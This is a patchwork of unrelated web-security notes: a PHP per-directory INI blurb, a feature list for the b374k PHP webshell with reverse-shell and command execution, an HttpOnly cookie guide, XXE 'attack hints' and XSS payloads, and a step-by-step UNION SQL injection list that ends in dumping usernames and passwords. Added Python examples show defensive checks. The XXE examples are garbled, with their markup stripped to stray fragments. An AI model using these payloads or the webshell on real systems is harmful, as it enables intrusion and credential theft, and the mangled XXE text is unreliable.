PHP per-directory INI settings
Most of the configuration variables can be set on a per-directory basis. This can be used when you have a single web server that is serving multiple applications, and:
- You want to use a different application name for each of those applications.
- You want to tweak certain settings on an application-by-application basis.
b374k-PHP shell
PHP webshell with many features, such as:
- File manager (view, edit, rename, delete, upload, download as archive, etc.)
- Command execution
- Script execution (php, perl, python, ruby, java, node.js, c)
- Gives you a shell via bind/reverse shell connection
- Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more using ODBC or PDO)
- Process list/Task manager
- API to control this shell from other scripts/programs (see wiki)
- All of that in only 1 file, no installation needed
- Supports PHP v4 and v5
- Search function (ver 2.4)
- Hex editor (ver 2.4)
- SQL Explorer (ver 2.4)
Protecting Your Cookies: HttpOnly
What is HttpOnly?
According to the Microsoft Developer Network, HttpOnly is an additional flag included in a Set-Cookie HTTP response header. Using the HttpOnly flag when generating a cookie helps mitigate the risk of client-side script accessing the protected cookie (if the browser supports it). The example below shows the syntax used within the HTTP response header:
Set-Cookie: <name>=<value>[; <name>=<value>][; expires=<date>][; domain=<domain_name>][; path=<some_path>][; secure][; HttpOnly]
If the (optional) HttpOnly flag is included in the HTTP response header, the cookie cannot be accessed through client-side script (again, if the browser supports this flag). As a result, even if a cross-site scripting (XSS) flaw exists and a user accidentally accesses a link that exploits it, the browser (primarily Internet Explorer) will not reveal the cookie to a third party.
If a browser does not support HttpOnly and a website attempts to set an HttpOnly cookie, the flag will be ignored by the browser, creating a traditional, script-accessible cookie. As a result, the cookie (typically your session cookie) becomes vulnerable to theft or modification by malicious script.
Using PHP to set HttpOnly
PHP has supported setting the HttpOnly flag since version 5.2.0 (November 2006). For session cookies managed by PHP, the flag is set either permanently in php.ini (see the PHP manual on HttpOnly) through the parameter:
session.cookie_httponly = True
or at runtime, within a script, via the function
void session_set_cookie_params ( int $lifetime [, string $path [, string $domain [, bool $secure= false [, bool $httponly= false ]]]] )
For application cookies, the last parameter of setcookie() sets the HttpOnly flag:
bool setcookie ( string $name [, string $value [, int $expire= 0 [, string $path [, string $domain [, bool $secure= false [, bool $httponly= false ]]]]]] )
Web Server
Implement in Apache:
1. Ensure mod_headers.so is enabled in your Apache instance.
2. Add the following entry to httpd.conf:
Header edit Set-Cookie ^(.*)$ $1;HttpOnly;Secure
3. Restart the Apache web server.
Note: Header edit is not available in Apache versions older than 2.2.4. You can use the following to set the HttpOnly and Secure flags in versions older than 2.2.4. Thanks to Ytse for sharing this information.
Header set Set-Cookie HttpOnly;Secure
Verification:
Open your website with HttpWatch, Live HTTP Headers, or an online HTTP header tool. Check the HTTP response header; you should see the HttpOnly and Secure flags on the Set-Cookie header.
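The verification step above is done by eye in a browser tool; the following is an added example (not from the page, and written in Python rather than PHP) that performs the same check on a captured response and also emulates the mod_headers rule given above, so you can see what the rewrite actually produces. The response text is constructed for the example.

```python
import re

# Constructed sample response (not captured from a real site): one cookie set
# correctly, one with no flags, one with only Secure.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: PHPSESSID=abc123; path=/; HttpOnly; Secure\r\n"
    "Set-Cookie: prefs=dark; path=/\r\n"
    "Set-Cookie: tracker=xyz; domain=example.com; secure\r\n"
)


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into name, value, flags and attributes.

    Flag names are case-insensitive, so they are normalised to lower case.
    """
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    flags = {p.lower() for p in parts[1:] if "=" not in p}
    attrs = dict(p.split("=", 1) for p in parts[1:] if "=" in p)
    return {"name": name.strip(), "value": value, "flags": flags, "attrs": attrs}


def audit_cookies(raw_headers):
    """Return [(cookie name, [missing flags])] for every Set-Cookie header."""
    findings = []
    for line in raw_headers.splitlines():
        if not line.lower().startswith("set-cookie:"):
            continue
        cookie = parse_set_cookie(line.split(":", 1)[1])
        missing = [f for f in ("httponly", "secure") if f not in cookie["flags"]]
        findings.append((cookie["name"], missing))
    return findings


def apache_header_edit(header_value):
    """Emulate the page's rule: Header edit Set-Cookie ^(.*)$ $1;HttpOnly;Secure.

    The flags are appended unconditionally, so a cookie that already carries
    them ends up with duplicate flags (harmless, but visible in an audit).
    """
    return re.sub(r"^(.*)$", r"\1;HttpOnly;Secure", header_value)
```

Note that `Header set` (the pre-2.2.4 variant) replaces the whole header value rather than appending to it, so run the audit on the real response rather than trusting the directive.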
Secure your web application today!
Read - Apache Web Server Security & Hardening Guide - Practical Guide
XML External Entity Attack Hints
Overview
An XML External Entity attack may result when an application allows an input parameter to be XML, or to be incorporated into XML, which is then passed to an XML parser running with sufficient privileges to include external or system files.
Discovery Methodology
Attempt to inject XML or reserved characters into input parameters and observe if XML parsing errors are generated.
For web services, check each input parameter specified in the WSDL document for those of type XML.
Exploitation
Use information disclosed in error messages to determine at what file path the XML parser is parsing. Cause errors to occur using malformed XML, XML that starts with whitespace or null characters, and XML that does not meet the XSL specification.
Also try to load files that don't exist in order to determine the operating system type and the path at which interpretation is taking place.
Example
XML is well known for containing data (text nodes) which are marked up by tags (element nodes). XML also has place-holders called entities. Web developers often use pre-defined entities without realizing they are using an XML entity. For example, the less-than symbol < can be represented by the pre-defined entity &lt;. The &lt; entity is defined in the parser itself; there is no need to declare it before using it. However, developers are allowed to declare their own entities. XML documents also contain a mechanism by which they can import and include external files as part of themselves. The imported file will be included into the XML document wherever the entity reference appears.
Here are some examples to try
Valid XML without entities
Hello World
XML with the predefined &quot; entity
"Hello World"
XML with the user defined myEntity entity
XML with multiple user defined entities
]>
The DOCTYPE section of an XML document optionally defines external files to be included as part of the XML document. Interestingly, these can even be files from the system parsing the XML.
To declare an external entity, the ENTITY directive defines the resource represented and the symbol that will represent the entity. In this example, the entity is a local system resource, as indicated by the "SYSTEM" keyword; the resource is a local file (./robots.txt), and the symbol that represents the entity is "systemEntity". Entities do not have to be external, but in this example the system file happens to be an external resource. Entities can also be strings or other local variables.
The XML parser will import the file. The file's contents can be output into the XML document by placing the symbol in the document, preceded by an ampersand (&) and followed by a semicolon (;).
&systemEntity;
In an external entity attack, XML is injected or uploaded to the site in an effort to get the XML parser to import the injected entity into the XML and then output the contents of the entity.
]>
If the web server is misconfigured or given too many privileges, the XML parser can import operating system files. This example works on many Windows systems.
]>
The output will look similar to the following:
[boot loader] timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP
Professional" /fastdetect /NoExecute=OptIn ;
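The declaration and reference mechanism described above (DOCTYPE, an ENTITY declared with SYSTEM, then &name; in the body) is what a defensive parser has to intercept. This is an added example, not the page's own code and not PHP's DOMDocument: a wrapper around Python's standard-library expat parser that records every DOCTYPE and entity declaration as a finding and refuses to fetch an external entity, so the parse fails instead of disclosing the file. The three documents are constructed for the example; ./robots.txt is the resource named in the text and is never opened.

```python
import xml.parsers.expat

# Constructed sample documents. The external entity names ./robots.txt (the
# resource used in the text above); the parser below never opens it.
SAFE_DOC = b'<?xml version="1.0"?><greeting>Hello World</greeting>'
INTERNAL_DOC = (b'<?xml version="1.0"?>'
                b'<!DOCTYPE greeting [<!ENTITY myEntity "Hello">]>'
                b'<greeting>&myEntity; World</greeting>')
EXTERNAL_DOC = (b'<?xml version="1.0"?>'
                b'<!DOCTYPE greeting [<!ENTITY systemEntity SYSTEM "./robots.txt">]>'
                b'<greeting>&systemEntity;</greeting>')


def parse_untrusted(data):
    """Parse XML from an untrusted source without resolving external entities.

    Returns (text content, findings, error). Every DOCTYPE and ENTITY
    declaration is recorded as a finding, which is what a log or WAF rule
    would key on. A reference to an external entity is refused by returning
    0 from the handler, which makes expat abort the parse instead of reading
    the resource.
    """
    parser = xml.parsers.expat.ParserCreate()
    findings, chunks = [], []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings.append(f"DOCTYPE {name} declared")

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        kind = "external" if system_id else "internal"
        findings.append(f"{kind} entity {name} -> {system_id or value!r}")

    def on_external_ref(context, base, system_id, public_id):
        findings.append(f"blocked fetch of {system_id}")
        return 0  # a false return value makes expat raise instead of loading

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.CharacterDataHandler = chunks.append
    try:
        parser.Parse(data, True)
        error = None
    except xml.parsers.expat.ExpatError as exc:
        error = str(exc)
    return "".join(chunks), findings, error
```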
Other injections are possible. This version uses injected comment symbols to alter the XML, which is useful for filter bypass.
Hello World <!--
NJ
This is a slightly different version of XXE to fetch robots.txt.
]>
&systemEntity; ;
This injection results in a cross-site script.
$lDOMDocument->textContent=<![CDATA[<]]>script<![CDATA[>]]>alert('XSS')<![CDATA[<]]>/script<![CDATA[>]]>
This injection also results in a cross-site script.
<script>alert("Hello
World")</script>
Some SQL Injection
1. ?id=1
2. ?id=1' --+
3. ?id=1' Order by 1 --+
4. ?id=-1' union select 1,2,database() --+
5. ?id=-1' union select 1,version(),database() --+
6. ?id=-5' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 2,1--+
7. ?id=-5' union select 1,column_name,3 from information_schema.columns where table_name="users"--+
8. ?id=-5' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users"--+
9. ?id=-5' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name="users"--+
10. ?id=-5' union select 1,group_concat(username), group_concat(password) from users--+
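The payloads listed above work because the id parameter is concatenated into the query string, so the attacker's quote closes the literal. This added example (not from the page) runs steps 1, 4 and 10 against a constructed in-memory SQLite table through a concatenated query and through a parameterized one, which is the fix; SQLite accepts `--+` as a comment like MySQL, but has no information_schema, so steps 6 to 9 are not exercised.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the application's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "hash-a"), (2, "bob", "hash-b")])
    return conn


def lookup_vulnerable(conn, id_param):
    """String concatenation: whatever follows the attacker's quote is executed as SQL."""
    sql = "SELECT id, username, password FROM users WHERE id='" + id_param + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, id_param):
    """Parameterized query: id_param is bound as a value and can never change the statement."""
    return conn.execute(
        "SELECT id, username, password FROM users WHERE id=?", (id_param,)
    ).fetchall()


def validated_id(id_param):
    """Defence in depth: the id is a positive integer, so reject anything else up front."""
    if not id_param.isdigit():
        raise ValueError("id must be a positive integer")
    return int(id_param)
```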